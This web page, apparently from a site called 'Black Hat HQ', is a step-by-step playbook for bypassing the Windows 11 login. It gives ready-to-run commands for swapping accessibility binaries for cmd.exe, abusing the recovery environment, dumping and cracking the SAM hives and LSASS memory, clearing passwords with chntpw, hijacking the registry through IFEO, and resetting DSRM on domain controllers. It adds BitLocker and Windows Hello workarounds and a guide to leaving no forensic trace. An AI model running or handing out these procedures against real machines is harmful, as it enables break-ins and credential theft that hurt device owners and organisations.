top of page

Hacking Windows 11 Login

Hacking Windows 11 Login | Black Hat HQ

Bypassing Windows 11 Login


here's the full playbook/guide organized from simplest to most advanced on how to hack/bypass the Windows 11 login.


Method 1: Sticky Keys / Utilman Swap (The Classic)


This is the gold standard for physical access. You boot from external media, replace an accessibility binary with cmd.exe, reboot, and the login screen spawns a SYSTEM shell.


Procedure


  1. Boot from Windows install USB or any Linux live USB

  2. At the Windows installer, press Shift+F10 for a command prompt

  3. Determine the Windows drive (usually C: but may be D: or E: under WinPE):


cmd

diskpart
list volume
exit

  1. Navigate to System32 and swap the binary:


cmd

C:
cd Windows\System32

:: Backup the original
copy utilman.exe utilman.bak
copy sethc.exe sethc.bak

:: Replace with cmd.exe
copy /y cmd.exe utilman.exe
copy /y cmd.exe sethc.exe

  1. Reboot into Windows normally

  2. At the login screen, click the Ease of Access icon (utilman) or tap Shift 5 times (sethc)

  3. A SYSTEM-level cmd.exe spawns. Now you have options:


cmd

:: Option A: Create a new admin user
net user pentest Password123! /add
net localgroup administrators pentest /add

:: Option B: Reset existing user's password
net user targetuser NewPassword123!

:: Option C: Enable the built-in Administrator
net user Administrator /active:yes
net user Administrator NewPass123!

Important: Restore After Testing


cmd

:: From the same shell or via recovery USB
copy /y utilman.bak utilman.exe
copy /y sethc.bak sethc.exe

Windows 11 caveat: Microsoft Defender's Tamper Protection and some EDR solutions watch for System32 binary modifications. If the target has Defender fully configured, this may trigger a remediation. Check if the environment has this locked down before relying on this method.


Method 2: Replace osk.exe (On-Screen Keyboard)


Same concept as utilman, but uses the On-Screen Keyboard trigger instead, which some defenders overlook:


cmd

:: From WinPE/Recovery command prompt
cd C:\Windows\System32
copy osk.exe osk.bak
copy /y cmd.exe osk.exe

At the login screen: Ease of Access → On-Screen Keyboard spawns your SYSTEM shell.


Method 3: WinRE Command Prompt via Boot Disruption


This one doesn't even require external media. You exploit the Windows Recovery Environment:


  1. Power on the machine

  2. When you see the Windows spinning dots, hold the power button to force shutdown

  3. Repeat this 2-3 times

  4. On the 4th boot, Windows detects startup failure and loads Automatic Repair

  5. Click Advanced options → Troubleshoot → Advanced options → Command Prompt

  6. This cmd.exe runs as SYSTEM. Execute the same net user commands from Method 1.


No USB required, no binary swaps needed, and harder to audit since it's a built-in recovery feature. The downside: it's slightly unreliable — some Windows 11 builds skip directly to BitLocker recovery if the boot is interrupted.


Method 4: Dump and Crack SAM + SYSTEM Hives


If you want the actual passwords rather than just adding a user:


cmd

:: From WinPE or Method 3's cmd prompt
C:
cd Windows\System32\config

:: Copy the hives
copy SAM D:\sam
copy SYSTEM D:\system
copy SECURITY D:\security   :: Optional, contains cached domain creds

:: Or directly to a USB drive
copy SAM E:\
copy SYSTEM E:\

Then on your attack machine:


bash

# Dump hashes with impacket
impacket-secretsdump -sam sam -system system LOCAL

# Or with samdump2
samdump2 system sam > hashes.txt

# Crack with hashcat
hashcat -m 1000 hashes.txt rockyou.txt

The output format is user:rid:LM:NT:::. The NT hash is what you care about.


Windows 11 note: If the machine is Azure AD-joined (common now), local SAM won't have the cloud account credentials. You'll get local accounts only. For Azure AD, you'd need to go after cached domain credentials in the SECURITY hive or target the LSASS process.


Method 5: LSASS Dump (If You Can Get Code Execution)


If you have ANY kind of shell on the box (phishing payload, RDP with a low-privilege account, physical keyboard access to a logged-in session), dump LSASS:


powershell

# Find LSASS PID
Get-Process lsass

# Dump with built-in tools (admin required)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full

# Or with procdump (if you can drop it)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

Extract on your attack machine:


bash

# With pypykatz (cross-platform Mimikatz)
pypykatz lsa minidump lsass.dmp

# Or with impacket
impacket-secretsdump -just-dc-ntlm DOMAIN/user:pass@target

This gets you cleartext passwords (if WDigest is enabled), NT hashes, Kerberos tickets, and DPAPI master keys. On Windows 11, cleartext passwords in LSASS are disabled by default but can be re-enabled with the UseLogonCredential registry key.


Method 6: Boot From Linux Live USB - Chntpw


Boot from Kali or any Linux live USB, mount the Windows drive, and use chntpw:


bash

# Install if not present
apt install chntpw

# Mount the Windows partition
mount /dev/sda3 /mnt/windows

# List users
chntpw -l /mnt/windows/Windows/System32/config/SAM

# Clear a user's password
chntpw -u targetuser /mnt/windows/Windows/System32/config/SAM
# Select option 1: Clear (blank) user password

# Or promote to admin
chntpw -u targetuser /mnt/windows/Windows/System32/config/SAM
# Select option 3: Promote to administrator

chntpw directly modifies the SAM hive — it clears the password hash entirely, leaving the account blank. On Windows 11, blank passwords are blocked from network logon by default, but local interactive logon works.


Method 7: Replace LogonUI.exe Handler (Registry Method)


More subtle than binary swaps — when the login screen loads, it reads registry keys that point to accessibility handlers. You can modify these from offline registry editing:


bash

# From Linux live USB, using chntpw's regediting capability
# or from WinPE, load the offline SOFTWARE hive

# Mount the SOFTWARE hive
reg load HKLM\OFFLINE C:\Windows\System32\config\SOFTWARE

# Navigate to:
# HKLM\OFFLINE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe

# Set Debugger value to cmd.exe
reg add "HKLM\OFFLINE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f

# Unload
reg unload HKLM\OFFLINE

Now when utilman.exe launches at login, the Image File Execution Options redirect it to cmd.exe instead. This is harder to detect than a binary swap because the original utilman.exe is untouched.


Method 8: DSRM Password Reset (Domain Controllers Only)


If the target is a domain controller and you have physical access:


  1. Boot from Windows Server install media

  2. Shift+F10 for command prompt

  3. Rename utilman.exe → cmd.exe (Method 1)

  4. Reboot, launch the shell at login

  5. Reset DSRM password:


cmd

ntdsutil
set dsrm password
reset password on server %COMPUTERNAME%
NewP@ssword123!
NewP@ssword123!
quit
quit

  1. Reboot into Directory Services Restore Mode (F8 at boot), log in as .\Administrator with the new DSRM password

  2. From DSRM, you have full access to the NTDS.dit database


BitLocker: The Roadblock


Every method above fails if the drive is encrypted with BitLocker and you don't have the recovery key. When you boot to WinPE or Linux, the Windows partition shows as raw encrypted data.


Signs BitLocker is active: When you boot and see a blue screen asking for a PIN or recovery key before Windows even starts to load.


Workarounds if BitLocker is on:


  • If the machine is already booted and at the login screen, BitLocker has already been unlocked — Methods 3, 5, and 7 may still work since the drive is decrypted at runtime

  • Grab the recovery key from AD if you have domain admin creds

  • Check for sticky-note-key or key-left-in-drawer (physical security assessment)

  • The Method 3 (WinRE boot disruption) can still work — when Windows enters Automatic Repair and prompts for BitLocker recovery key, the OS drive is unlocked, and the recovery environment's cmd.exe can access it


Windows Hello / PIN / Biometrics


Windows 11 pushes passwordless authentication aggressively. The PIN is tied to the TPM and the specific device. You can't crack a Windows Hello PIN offline the way you can with a password hash.


What you can do instead:


  • Reset the PIN (from a SYSTEM shell): The PIN is a convenience layer on top of the password. Once you add a new admin user via Method 1, you can reset the original user's PIN from within Windows.

  • Disable Windows Hello via registry from offline editing

  • Convert PIN to password: If the user configured a PIN but also has a password (which they must — PIN requires a backing password), you can revert to password authentication. From a SYSTEM cmd:


cmd

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI" /v LastLoggedOnProvider /t REG_SZ /d "{60B78E88-EAD8-445C-9CFD-0B87F74EA6CD}" /f

This forces the login screen to show the password field instead of the PIN prompt.


Quick Decision Matrix


Scenario

Best Method

Physical access, no BitLocker, quick

Method 1 (utilman swap)

Physical access, no USB drive on hand

Method 3 (WinRE boot disruption)

Want real passwords, not just bypass

Method 4 (dump SAM) or Method 5 (LSASS dump)

Domain controller

Method 8 (DSRM reset)

BitLocker is on, machine is off

You need the recovery key first

BitLocker is on, machine is at login screen

Method 3 (WinRE) or Method 7 (registry IFEO)

Windows Hello PIN blocking password login

Use Method 1 to get SYSTEM, then toggle registry

Want stealthy, leave no forensic trace

Method 4 (take the hashes, crack offline, log in normally with password)


Enroll In Online Cybersecurity & Hacking Classes/Courses | Black Hat HQ

Comments


bottom of page